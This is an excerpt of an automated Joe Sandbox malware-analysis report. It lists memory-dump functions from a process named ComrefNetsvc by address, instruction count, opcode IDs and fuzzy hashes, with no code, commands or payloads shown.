                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9baa0000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b102ab420a122fe74c352debb44adb1b88e614990147e04db0cb8361df2ab40e
                                                                                  • Instruction ID: fd362ddb5ec63fc8b9236e916da1600ab41d4bdf419098ddf068e9f8edb05d13
                                                                                  • Opcode Fuzzy Hash: b102ab420a122fe74c352debb44adb1b88e614990147e04db0cb8361df2ab40e
                                                                                  • Instruction Fuzzy Hash: 8FE08611B1D6490BF37867A808367B46586EF99B10F0A41B9E84EC73D3DD982D0143A6
                                                                                  Function 00007FFD9BAA747D Relevance: .0, Instructions: 21COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2187996476.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9baa0000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b527d985c15f9180c6c6b220881f3894b20cfedf3e780ebcca98ac4871637c66
                                                                                  • Instruction ID: ee44bc65739102566befe474e343d9f9f21e307b8ee5d7dfba153c13ef2898da
                                                                                  • Opcode Fuzzy Hash: b527d985c15f9180c6c6b220881f3894b20cfedf3e780ebcca98ac4871637c66
                                                                                  • Instruction Fuzzy Hash: CCE0ED30F0A41E4EF7B4A794C8A0BB96263AF94704F1500B5D60ED32E1DDB86E808A15
                                                                                  Function 00007FFD9BE84E77 Relevance: .0, Instructions: 19COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0cc22a9a52c916cc7996c36f750a770ff9ba5d8ae33b6450750cf36b24f824f5
                                                                                  • Instruction ID: e086bc86319b88bc9b7cb196beb7e89fdacbf56fc340c4d193f8dd121215141e
                                                                                  • Opcode Fuzzy Hash: 0cc22a9a52c916cc7996c36f750a770ff9ba5d8ae33b6450750cf36b24f824f5
                                                                                  • Instruction Fuzzy Hash: 8CE0CD11B4FF8A4FE73206B408320781AA4CF1734070601BEC0568E2E3E9666A054391
                                                                                  Function 00007FFD9BAA12B8 Relevance: .0, Instructions: 14COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2187996476.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9baa0000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 59daee92eb1d2e023c8a26c31594405dadfdef9a4ba68cc8f3e34044a0fd0e95
                                                                                  • Instruction ID: 768650a18b1e3eed0aabf59b137094a7e7a1eb3ecf57f48b52d4f59f8b88b109
                                                                                  • Opcode Fuzzy Hash: 59daee92eb1d2e023c8a26c31594405dadfdef9a4ba68cc8f3e34044a0fd0e95
                                                                                  • Instruction Fuzzy Hash: 76C0123061180C8FCA88EB28C894D2473E1FB19304B960094E00DCB2B1D66AECC2CB80
                                                                                  Function 00007FFD9BAA06AD Relevance: .0, Instructions: 13COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2187996476.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9baa0000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 449305775d5cc81ce54fea4df341ef3a3c10a309513e3ef34989929b14f59708
                                                                                  • Instruction ID: 38c978868a26cce8eb2435f2e2a388b48800e8925cad7fce6bf16187f4daecf2
                                                                                  • Opcode Fuzzy Hash: 449305775d5cc81ce54fea4df341ef3a3c10a309513e3ef34989929b14f59708
                                                                                  • Instruction Fuzzy Hash: 89C00205F5B55F01E47533AA54660ADA2425BC4F28FD71172D50D900A1ACDD229A016A
                                                                                  Function 00007FFD9BAA0B18 Relevance: .0, Instructions: 12COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2187996476.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9baa0000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 57f70d88e5b2174ef0906753d9276444bdac17c23c3b83889dabecf84ab63d32
                                                                                  • Instruction ID: 9f82d84850713459fb620a3f0caafedf7f962839c0f628484a5adc375b3696a7
                                                                                  • Opcode Fuzzy Hash: 57f70d88e5b2174ef0906753d9276444bdac17c23c3b83889dabecf84ab63d32
                                                                                  • Instruction Fuzzy Hash: A0C08C306218088FC904EB2CC88480032A0FB0E214BC20090E00EC7170E25A9C80C700
                                                                                  Function 00007FFD9BE8B64B Relevance: .0, Instructions: 11COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e9b1faa9efd37bb4aa4e56e20da0865f31bbd12524b6dc8ecb642a0a50351274
                                                                                  • Instruction ID: 5111dcea94147dc79fc77c5b2f8c99bce1c8cb841538139ef24bb93934092b09
                                                                                  • Opcode Fuzzy Hash: e9b1faa9efd37bb4aa4e56e20da0865f31bbd12524b6dc8ecb642a0a50351274
                                                                                  • Instruction Fuzzy Hash: D0D09258B0FE4F86F53956E1907163A329C4F06301E224439C07F418F1CD3BBA017206
                                                                                  Function 00007FFD9BE8594B Relevance: .0, Instructions: 11COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 56f86e3897342ac0bf8bcd35fad811f6b5f810423e5dfae3f88a823029f6cdc1
                                                                                  • Instruction ID: 5dbdbcaefa94a71cd646463ed7d4c079470dcf7c3b1a6b359bc7c24ac149e8de
                                                                                  • Opcode Fuzzy Hash: 56f86e3897342ac0bf8bcd35fad811f6b5f810423e5dfae3f88a823029f6cdc1
                                                                                  • Instruction Fuzzy Hash: 5ED09214B0EE4F85F53846C1817023A61FC9F10310F2A407EC0BF519F19E3A7B016246
                                                                                  Function 00007FFD9BAA6306 Relevance: .0, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2187996476.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9baa0000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 75002680c7670b65a0f72586ee82e77e780fbb8e75a5f4b33c98994084c51113
                                                                                  • Instruction ID: d37c212293bbf51ead93e48aa807c42cefecf0b86dfe2c141a8108863087eec7
                                                                                  • Opcode Fuzzy Hash: 75002680c7670b65a0f72586ee82e77e780fbb8e75a5f4b33c98994084c51113
                                                                                  • Instruction Fuzzy Hash: DFC04C21F2C81B07E6696654443567E04435F5671CF590275F01ED72DECD9C5B0102C7
                                                                                  Function 00007FFD9BE8B65E Relevance: .0, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7e25f51bdcb0c5ad1d60542835a51120ec5a1c997ec6c39216960fa089452acc
                                                                                  • Instruction ID: 25d364c61c2f087d3412904f58ebbad67c20bd4f8edb926da13c21678e733de2
                                                                                  • Opcode Fuzzy Hash: 7e25f51bdcb0c5ad1d60542835a51120ec5a1c997ec6c39216960fa089452acc
                                                                                  • Instruction Fuzzy Hash: ADC08010A0ED0B8FF23553A0803573637588F05340F124475C41D454F1CD3777416311
                                                                                  Function 00007FFD9BE8595E Relevance: .0, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 18c87b051d6825a64053fd9f7126e6ba3d4618cc4b5841c163cff0db19a8619f
                                                                                  • Instruction ID: 013d4e414d117e9d054189a4fb6777e161f205e6c7e7fb8d67ef1e7b498a10be
                                                                                  • Opcode Fuzzy Hash: 18c87b051d6825a64053fd9f7126e6ba3d4618cc4b5841c163cff0db19a8619f
                                                                                  • Instruction Fuzzy Hash: 36C08C20A0EE0B8FF2394390803123537F89F01340F2280BAC43E4A8F2CE3A3B019212
                                                                                  Function 00007FFD9BAA0548 Relevance: .0, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2187996476.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9baa0000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e767dbfc69b97d738909ab2f2afa8b331b2b1ec2d1c92f8e2b7e9e30affcecac
                                                                                  • Instruction ID: e94d37c7859e3995afdcd0a6381f2e889de6935e7d355e9d974d7be4ed1cc8a4
                                                                                  • Opcode Fuzzy Hash: e767dbfc69b97d738909ab2f2afa8b331b2b1ec2d1c92f8e2b7e9e30affcecac
                                                                                  • Instruction Fuzzy Hash: 3BB01230E5760F47DA3837B908520B47151AF06204FE201B4D40A401A1E8EF52D5C262
                                                                                  Function 00007FFD9BAA06D0 Relevance: .0, Instructions: 8COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2187996476.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9baa0000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 12075ca07fa7e8991284322c75c2ce303e1fccd3f33e797903a1050133ec576d
                                                                                  • Instruction ID: d6dab4be60c2802d921f694c23383ba5028d027c0c76db12da31444c52833f63
                                                                                  • Opcode Fuzzy Hash: 12075ca07fa7e8991284322c75c2ce303e1fccd3f33e797903a1050133ec576d
                                                                                  • Instruction Fuzzy Hash: DCB01200D5740F00E43433FA08A206C71816B44300FC60170D40D90091ACCD22990267

                                                                                  Non-executed Functions

                                                                                  Function 00007FFD9BAA8180 Relevance: .1, Instructions: 115COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2187996476.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9baa0000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d9506aa44435c8b4daafe3725083c5e38fcd34bed9aefa2f879d90378301ab84
                                                                                  • Instruction ID: ac57fff5c885a79708c31f3b2340a2858350025ce9cd974d7721ee7b06705734
                                                                                  • Opcode Fuzzy Hash: d9506aa44435c8b4daafe3725083c5e38fcd34bed9aefa2f879d90378301ab84
                                                                                  • Instruction Fuzzy Hash: 0231CDB254E3C81FD3535BB49C664E63FB4EE53270B0A01EBD085CB4A3E15A695AC372